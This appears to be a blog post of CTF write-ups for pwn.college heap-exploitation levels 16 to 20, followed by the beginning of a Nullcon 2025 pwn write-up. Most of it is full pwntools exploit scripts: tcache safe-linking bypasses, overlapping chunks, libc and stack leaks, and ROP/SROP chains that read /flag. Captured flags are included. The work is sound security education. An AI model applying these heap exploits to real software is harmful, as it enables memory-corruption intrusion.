    launch()

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)

    puts(0)
    target.recvuntil(b"Data: ")
    mangled = int.from_bytes(target.recvline().strip(), "little")

    puts(1)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")
    heap = demangle(pos, mangled)

    secret = elf.bss() + 0x27B60
    secret_mangled_1 = mangle(pos, secret)
    secret_mangled_2 = mangle(pos, (secret - 0x8))

    target.success(f"pos: {hex(pos)}")
    target.success(f"mangled: {hex(mangled)}")
    target.success(f"heap: {hex(heap)}")
    target.success(f"secret: {hex(secret)}")
    target.success(f"secret_mangled_1: {hex(secret_mangled_1)}")
    target.success(f"secret_mangled_2: {hex(secret_mangled_2)}")

    scanf(0, flat(secret_mangled_1))
    malloc(0, 0)

    # the following malloc will be done 2 things:
    # 1/ zero out the last 8 bytes secret
    # 2/ let the first 8 bytes secret value to be the appropriate tcache bin's
    #    header
    malloc(0, 0)

    malloc(0, 0)
    # now the following free will use the value left on tcache bin header,
    # which is the secret value, to fill the fd
    free(0)
    puts(0)

    target.recvuntil(b"Data: ")
    secret_mangled = int.from_bytes(target.recv(8), "little")
    secret_demangled = demangle(pos, secret_mangled)
    target.success(f"secret_demangled: {hex(secret_demangled)}")

    secret = demangle(secret, secret_demangled, 0)
    target.success(f"secret: {hex(secret)}")

    send_flag(flat(secret, 0).decode())
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{MWVB7nml1ki-wvzXebiEIEuESuU.dhDO0MDL5cTNxgzW}]

Level 16.1

Information

Category: Pwn

Description

Revisit a prior challenge, now with TCACHE safe-linking.

Write-up

参见 Level 16.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level16.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", str(secret).encode())


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)

    puts(0)
    target.recvuntil(b"Data: ")
    mangled = int.from_bytes(target.recvline().strip(), "little")

    puts(1)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")
    heap = demangle(pos, mangled)

    secret = elf.bss() + 0x1CE90
    secret_mangled_1 = mangle(pos, secret)
    secret_mangled_2 = mangle(pos, (secret - 0x8))

    target.success(f"pos: {hex(pos)}")
    target.success(f"mangled: {hex(mangled)}")
    target.success(f"heap: {hex(heap)}")
    target.success(f"secret: {hex(secret)}")
    target.success(f"secret_mangled_1: {hex(secret_mangled_1)}")
    target.success(f"secret_mangled_2: {hex(secret_mangled_2)}")

    scanf(0, flat(secret_mangled_1))
    malloc(0, 0)

    # the following malloc will be done 2 things:
    # 1/ zero out the last 8 bytes secret
    # 2/ let the first 8 bytes secret value to be the appropriate tcache bin's
    #    header
    malloc(0, 0)

    malloc(0, 0)
    # now the following free will use the value left on tcache bin header,
    # which is the secret value, to fill the fd
    free(0)
    puts(0)

    target.recvuntil(b"Data: ")
    secret_mangled = int.from_bytes(target.recv(8), "little")
    secret_demangled = demangle(pos, secret_mangled)
    target.success(f"secret_demangled: {hex(secret_demangled)}")

    secret = demangle(secret, secret_demangled, 0)
    target.success(f"secret: {hex(secret)}")

    send_flag(flat(secret, 0).decode())
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:sopiler[pwn.college{ktet0NEaj6TQuRma_FkmhYKm5rq.dlDO0MDL5cTNxgzW}]

Level 17.0

Information

Category: Pwn

Description

Revisit a prior challenge, now with TCACHE safe-linking.

Write-up

泄漏了代码段地址和栈地址，但是不能直接分配到返回地址，如果分配到 RBP 也不行，执行 malloc_usable_size(ptr[n0xF_3]) 的时候会把 canary 当作 size，然后 SIGSEGV，继续往前分配的话，就不得不泄漏 canary 了，但因为输入函数是 scanf，所以泄漏 canary 好像也成为了不可能。

不过我们不难发现，它泄漏的这个栈地址就是 ptr[16] 的地址，那就很好办了，直接在里面写返回地址的栈地址，然后使用 scanf 对保持返回地址的那项进行写入。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level17.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.recvuntil(b"[LEAK] The local stack address of your allocations is at: ")
    stack = int(target.recvline().strip()[:-1], 16)
    ret = stack + 0x118

    target.recvuntil(b"[LEAK] The address of main is at: ")
    elf.address = int(target.recvline().strip()[:-1], 16) - 0x1B1B

    target.success(f"stack: {hex(stack)}")
    target.success(f"pie: {hex(elf.address)}")

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)

    puts(1)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")

    puts(0)
    target.recvuntil(b"Data: ")
    mangled = int.from_bytes(target.recvline().strip(), "little")
    heap = demangle(pos, mangled)

    target.success(f"pos: {hex(pos)}")
    target.success(f"mangled: {hex(mangled)}")
    target.success(f"heap: {hex(heap)}")

    stack_mangled = mangle(pos, stack)
    scanf(0, flat(stack_mangled))

    raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 0)

    payload = flat(
        stack,
        ret,
    )
    scanf(0, payload)

    scanf(1, flat(elf.sym["win"]))
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{wMAyk806GbwvQXzo8CWgpFdlih0.dBTO0MDL5cTNxgzW}]

Level 17.1

Information

Category: Pwn

Description

Revisit a prior challenge, now with TCACHE safe-linking.

Write-up

参见 Level 17.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level17.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.recvuntil(b"[LEAK] The local stack address of your allocations is at: ")
    stack = int(target.recvline().strip()[:-1], 16)
    ret = stack + 0x148

    target.recvuntil(b"[LEAK] The address of main is at: ")
    elf.address = int(target.recvline().strip()[:-1], 16) - 0x151B

    target.success(f"stack: {hex(stack)}")
    target.success(f"pie: {hex(elf.address)}")

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)

    puts(1)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")

    puts(0)
    target.recvuntil(b"Data: ")
    mangled = int.from_bytes(target.recvline().strip(), "little")
    heap = demangle(pos, mangled)

    target.success(f"pos: {hex(pos)}")
    target.success(f"mangled: {hex(mangled)}")
    target.success(f"heap: {hex(heap)}")

    stack_mangled = mangle(pos, stack)
    scanf(0, flat(stack_mangled))

    raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 0)

    scanf(0, flat(ret))
    scanf(0, flat(elf.sym["win"]))
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{I8R8BzpNtgq5LKv4UV3QhQYfU3h.dFTO0MDL5cTNxgzW}]

Level 18.0

Information

Category: Pwn

Description

Revisit a prior challenge, now with TCACHE safe-linking.

Write-up

这题就出的不好了，根本没用上 safe-linking 。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level18.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", secret)


def stack_free():
    target.sendlineafter(b": ", b"stack_free")


def stack_scanf(data):
    target.sendlineafter(b": ", b"stack_scanf")
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)

    puts(1)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")

    puts(0)
    target.recvuntil(b"Data: ")
    mangled = int.from_bytes(target.recvline().strip(), "little")

    target.success(f"pos: {hex(pos)}")
    target.success(f"mangled: {hex(mangled)}")

    payload = flat(
        b"A" * 0x30,
        0,
        0x401,
    )

    stack_scanf(payload)
    stack_free()

    raw_input("DEBUG")
    malloc(0, 0x3F0)

    payload = flat(
        b"A" * 0xBB,
        0,
        0,
    )
    scanf(0, payload)
    send_flag(flat(0, 0))
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{w9fBk2-OmoD0TO7dLtn3ypPp0RY.dJTO0MDL5cTNxgzW}]

Level 18.1

Information

Category: Pwn

Description

Revisit a prior challenge, now with TCACHE safe-linking.

Write-up

参见 Level 18.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level18.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def puts(idx):
    target.sendlineafter(b": ", b"puts")
    target.sendlineafter(b"Index: ", str(idx).encode())


def scanf(idx, data):
    target.sendlineafter(b": ", b"scanf")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def send_flag(secret):
    target.sendlineafter(b": ", b"send_flag")
    target.sendlineafter(b"Secret: ", secret)


def stack_free():
    target.sendlineafter(b": ", b"stack_free")


def stack_scanf(data):
    target.sendlineafter(b": ", b"stack_scanf")
    target.sendline(data)


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0)
    malloc(1, 0)
    free(1)
    free(0)

    puts(1)
    target.recvuntil(b"Data: ")
    pos = int.from_bytes(target.recvline().strip(), "little")

    puts(0)
    target.recvuntil(b"Data: ")
    mangled = int.from_bytes(target.recvline().strip(), "little")

    target.success(f"pos: {hex(pos)}")
    target.success(f"mangled: {hex(mangled)}")

    payload = flat(
        b"A" * 0x30,
        0,
        0x401,
    )

    stack_scanf(payload)
    stack_free()

    raw_input("DEBUG")
    malloc(0, 0x3F0)

    payload = flat(
        b"A" * 0x80,
        0,
        0,
    )
    scanf(0, payload)
    send_flag(flat(0, 0))
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{8b5lkMBpAAfr5wN2o6YrXmK9nLw.dNTO0MDL5cTNxgzW}]

Level 19.0

Information

Category: Pwn

Description

Leverage overlapping allocations to obtain the flag.

Write-up

Description 告诉我们需要使用 overlapping，那就先去了解一下那是个啥，我写了 Mirror, Mirror on the Heap 。

然后就很简单了，篡改 inuse chunk 的 size 再输出就好了，很简单的一个概念。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level19.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def safe_read(idx, data):
    target.sendlineafter(b": ", b"safe_read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def safe_write(idx):
    target.sendlineafter(b": ", b"safe_write")
    target.sendlineafter(b"Index: ", str(idx).encode())


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0x20)
    malloc(1, 0)
    read_flag()

    payload = flat(
        b"A" * 0x20,
        0,
        0x61,
    )
    # raw_input("DEBUG")
    safe_read(0, payload)

    free(1)
    raw_input("DEBUG")
    malloc(0, 0x50)
    safe_write(0)
    target.recvuntil(b"pwn.college{")
    flag = target.recvline().decode()
    target.success(f"pwn.college{{{flag}")
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{UyW-UEWgMm10Cadm41NCv96TtqR.dRTO0MDL5cTNxgzW}]

Level 19.1

Information

Category: Pwn

Description

Leverage overlapping allocations to obtain the flag.

Write-up

参见 Level 19.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyheap_level19.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def safe_read(idx, data):
    target.sendlineafter(b": ", b"safe_read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def safe_write(idx):
    target.sendlineafter(b": ", b"safe_write")
    target.sendlineafter(b"Index: ", str(idx).encode())


def read_flag():
    target.sendlineafter(b": ", b"read_flag")


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0x20)
    malloc(1, 0)
    read_flag()

    payload = flat(
        b"A" * 0x20,
        0,
        0x61,
    )
    # raw_input("DEBUG")
    safe_read(0, payload)

    free(1)
    raw_input("DEBUG")
    malloc(0, 0x50)
    safe_write(0)
    target.recvuntil(b"pwn.college{")
    flag = target.recvline().decode()
    target.success(f"pwn.college{{{flag}")
    quit()

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{ou87E6zOskHpMtWjDb0XpdVk9ub.dVTO0MDL5cTNxgzW}]

Level 20.0

Information

Category: Pwn

Description

16 bytes and a dream.

Write-up

说实话我没有 get 到这个 description 是什么意思，这 16 bytes 是指什么呢？

感觉这题就是前面所有知识点的综合，并且没有提供后门函数，我选择 ret2libc 然后打 ORW，不过打法多了去了，我只是选一个自认为比较方便的打。另外，这里我除了写了普通 ORW 外还复习了一下 SROP，可以看我 exp 注释掉的部分是普通 ORW 打法。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    ROP,
    SigreturnFrame,
    args,
    constants,
    context,
    flat,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/tcache-terror-easy"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("/challenge/lib/libc.so.6")


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def safe_read(idx, data):
    target.sendlineafter(b": ", b"safe_read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def safe_write(idx):
    target.sendlineafter(b": ", b"safe_write")
    target.sendlineafter(b"Index: ", str(idx).encode())


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0x410)
    malloc(1, 0)
    free(0)
    malloc(0, 0x410)
    safe_write(0)

    target.recvlines(2)
    libc.address = int.from_bytes(target.recv(0x8).strip(), "little") - 0x219CE0

    free(1)
    malloc(0, 0)
    # raw_input("DEBUG")
    safe_write(0)

    target.recvlines(2)
    pos = int.from_bytes(target.recv(0x8).strip(), "little")

    malloc(0, 0x10)
    malloc(1, 0)
    malloc(2, 0)
    malloc(3, 0)
    free(3)
    free(2)

    payload = flat(
        b"A" * 0x10,
        0,
        0x41,
    )
    safe_read(0, payload)

    free(1)
    malloc(1, 0x30)

    payload = flat(
        b"A" * 0x10,
        0,
        0x21,
        mangle(pos, libc.sym["environ"]),
    )
    # raw_input("DEBUG")
    safe_read(1, payload)
    malloc(0, 0)
    malloc(0, 0)
    # raw_input("DEBUG")
    safe_write(0)

    target.recvlines(2)
    ret = int.from_bytes(target.recv(0x8).strip(), "little") - 0x120
    rbp = ret - 0x8

    target.success(f"libc: {hex(libc.address)}")
    target.success(f"pos: {hex(pos)}")
    target.success(f"ret: {hex(ret)}")

    malloc(0, 0x10)
    malloc(1, 0)
    malloc(2, 0x100)
    malloc(3, 0x100)
    free(3)
    free(2)

    payload = flat(
        b"A" * 0x10,
        0,
        0x221,
    )
    # raw_input("DEBUG")
    safe_read(0, payload)

    free(1)
    malloc(1, 0x210)

    payload = flat(
        b"A" * 0x10,
        0,
        0x111,
        mangle(pos, ret - 0x8),
    )
    # raw_input("DEBUG")
    safe_read(1, payload)

    malloc(0, 0x100)
    raw_input("DEBUG")
    malloc(0, 0x100)

    rop = ROP(libc)

    # payload = flat(
    #     # open
    #     b"/flag\x00\x00\x00",
    #     rop.rdi.address,
    #     rbp,
    #     rop.rsi.address,
    #     0,
    #     rop.rax.address,
    #     constants.SYS_open,
    #     rop.find_gadget(["syscall", "ret"])[0],
    #     # read
    #     rop.rdi.address,
    #     3,
    #     rop.rsi.address,
    #     rbp - 0x100,
    #     rop.rdx.address,
    #     0x100,
    #     rop.rax.address,
    #     0,
    #     rop.find_gadget(["syscall", "ret"])[0],
    #     # write
    #     rop.rdi.address,
    #     1,
    #     rop.rsi.address,
    #     rbp - 0x100,
    #     rop.rdx.address,
    #     0x100,
    #     rop.rax.address,
    #     1,
    #     rop.find_gadget(["syscall", "ret"])[0],
    # )

    frame = SigreturnFrame()

    frame.rax = constants.SYS_sendfile
    frame.rdi = 1
    frame.rsi = 3
    frame.rdx = ret + 0x18
    frame.r10 = 0x100
    frame.rip = rop.find_gadget(["syscall", "ret"])[0]

    payload = flat(
        # open
        b"/flag\x00\x00\x00",
        rop.rdi.address,
        rbp,
        rop.rsi.address,
        0,
        rop.rax.address,
        constants.SYS_open,
        rop.find_gadget(["syscall", "ret"])[0],
        # read
        rop.rdi.address,
        0,
        rop.rsi.address,
        rbp - 0x100,
        rop.rdx.address,
        0x100,
        rop.rax.address,
        0,
        rop.find_gadget(["syscall", "ret"])[0],
        # srop
        rop.rax.address,
        0xF,
        rop.rsp.address,
        rbp - 0x100,
    )

    # raw_input("DEBUG")
    safe_read(0, payload)
    raw_input("DEBUG")
    quit()

    payload = flat(
        rop.find_gadget(["syscall", "ret"])[0],
        frame,
    )
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{4fglWsi6vXF1cQOmxoxHe6iLybu.dZTO0MDL5cTNxgzW}]

Level 20.1

Information

Category: Pwn

Description

16 bytes and a dream.

Write-up

参见 Level 20.0。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    ROP,
    SigreturnFrame,
    args,
    constants,
    context,
    flat,
    process,
    raw_input,
    remote,
)

FILE = "/challenge/tcache-terror-hard"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = ELF("/challenge/lib/libc.so.6")


def malloc(idx, size):
    target.sendlineafter(b": ", b"malloc")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendlineafter(b"Size: ", str(size).encode())


def free(idx):
    target.sendlineafter(b": ", b"free")
    target.sendlineafter(b"Index: ", str(idx).encode())


def safe_read(idx, data):
    target.sendlineafter(b": ", b"safe_read")
    target.sendlineafter(b"Index: ", str(idx).encode())
    target.sendline(data)


def safe_write(idx):
    target.sendlineafter(b": ", b"safe_write")
    target.sendlineafter(b"Index: ", str(idx).encode())


def quit():
    target.sendlineafter(b": ", b"quit")


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    malloc(0, 0x410)
    malloc(1, 0)
    free(0)
    malloc(0, 0x410)
    safe_write(0)

    libc.address = int.from_bytes(target.recv(0x8).strip(), "little") - 0x219CE0

    free(1)
    malloc(0, 0)
    # raw_input("DEBUG")
    safe_write(0)

    pos = int.from_bytes(target.recv(0x8).strip(), "little")

    malloc(0, 0x10)
    malloc(1, 0)
    malloc(2, 0)
    malloc(3, 0)
    free(3)
    free(2)

    payload = flat(
        b"A" * 0x10,
        0,
        0x41,
    )
    # raw_input("DEBUG")
    safe_read(0, payload)

    free(1)
    malloc(1, 0x30)

    payload = flat(
        b"A" * 0x10,
        0,
        0x21,
        mangle(pos, libc.sym["environ"]),
    )
    safe_read(1, payload)
    malloc(0, 0)
    malloc(0, 0)
    # raw_input("DEBUG")
    safe_write(0)

    ret = int.from_bytes(target.recv(0x8).strip(), "little") - 0x120
    rbp = ret - 0x8

    target.success(f"libc: {hex(libc.address)}")
    target.success(f"pos: {hex(pos)}")
    target.success(f"ret: {hex(ret)}")

    malloc(0, 0x10)
    malloc(1, 0)
    malloc(2, 0x100)
    malloc(3, 0x100)
    free(3)
    free(2)

    payload = flat(
        b"A" * 0x10,
        0,
        0x221,
    )
    # raw_input("DEBUG")
    safe_read(0, payload)

    free(1)
    malloc(1, 0x210)

    payload = flat(
        b"A" * 0x10,
        0,
        0x111,
        mangle(pos, ret - 0x8),
    )
    # raw_input("DEBUG")
    safe_read(1, payload)

    malloc(0, 0x100)
    raw_input("DEBUG")
    malloc(0, 0x100)

    rop = ROP(libc)

    # payload = flat(
    #     # open
    #     b"/flag\x00\x00\x00",
    #     rop.rdi.address,
    #     rbp,
    #     rop.rsi.address,
    #     0,
    #     rop.rax.address,
    #     constants.SYS_open,
    #     rop.find_gadget(["syscall", "ret"])[0],
    #     # read
    #     rop.rdi.address,
    #     3,
    #     rop.rsi.address,
    #     rbp - 0x100,
    #     rop.rdx.address,
    #     0x100,
    #     rop.rax.address,
    #     0,
    #     rop.find_gadget(["syscall", "ret"])[0],
    #     # write
    #     rop.rdi.address,
    #     1,
    #     rop.rsi.address,
    #     rbp - 0x100,
    #     rop.rdx.address,
    #     0x100,
    #     rop.rax.address,
    #     1,
    #     rop.find_gadget(["syscall", "ret"])[0],
    # )

    frame = SigreturnFrame()

    frame.rax = constants.SYS_sendfile
    frame.rdi = 1
    frame.rsi = 3
    frame.rdx = ret + 0x18
    frame.r10 = 0x100
    frame.rip = rop.find_gadget(["syscall", "ret"])[0]

    payload = flat(
        # open
        b"/flag\x00\x00\x00",
        rop.rdi.address,
        rbp,
        rop.rsi.address,
        0,
        rop.rax.address,
        constants.SYS_open,
        rop.find_gadget(["syscall", "ret"])[0],
        # read
        rop.rdi.address,
        0,
        rop.rsi.address,
        rbp - 0x100,
        rop.rdx.address,
        0x100,
        rop.rax.address,
        0,
        rop.find_gadget(["syscall", "ret"])[0],
        # srop
        rop.rax.address,
        0xF,
        rop.rsp.address,
        rbp - 0x100,
    )

    # raw_input("DEBUG")
    safe_read(0, payload)
    raw_input("DEBUG")
    quit()

    payload = flat(
        rop.find_gadget(["syscall", "ret"])[0],
        frame,
    )
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[pwn.college{I4gOWGlF1e4mxxQJzpY65moHbAQ.ddTO0MDL5cTNxgzW}]

后记

从一开始的对 heap 充满了恐惧，到现在打完这一章也算是小有成就了，真的从来没想过这一天哈哈哈。接下来就可以去打 dynamic-allocator-exploitation chapter 了，据说是 how2heap 里面各种手法的实践。感觉难度一下就上了好几个台阶，不过我已经克服恐惧了，只是不知道能不能在一个月内打完，让我们拭目以待。

Write-ups: Nullcon Berlin HackIM 2025 CTF

Sun, 07 Sep 2025 00:00:00 GMT

Fotispy 1

Information

Category: Pwn
Points: 500

Description

Spotify with a GUI? A true hacker only needs the terminal. Note: Despite the naming, these 7 challenges can be solved in any order and do not depend on each other.

Write-up

经过分析，得到程序用的结构体大致是这样的：

00000000 struct Userdata // sizeof=0x18
00000000 {
00000000     char *username;
00000008     char *password;
00000010     struct Favorite *favorites;
00000018 };

00000000 struct Favourite // sizeof=0x10
00000000 {
00000000     struct Favourite *next;
00000008     struct Song *song;
00000010 };

00000000 struct Song // sizeof=0x30
00000000 {
00000000     char *title;
00000008     int title_len;
0000000C     // padding byte
0000000D     // padding byte
0000000E     // padding byte
0000000F     // padding byte
00000010     char *album;
00000018     int album_len;
0000001C     // padding byte
0000001D     // padding byte
0000001E     // padding byte
0000001F     // padding byte
00000020     char *from;
00000028     int from_len;
0000002C     // padding byte
0000002D     // padding byte
0000002E     // padding byte
0000002F     // padding byte
00000030 };

发现 memcpy 会复制定长数据到 dest，但是 dest 只有 13 字节，怀疑可能有 BOF。运行程序测试了一下，确实崩溃了。

:::tip 这里后期还得通过 display 函数泄漏 favourite 结构体的地址，因为我们不想执行第二次 while 循环，而覆盖返回地址一定会破坏原先的 favourite 结构体地址。 :::

int display_fav()
{
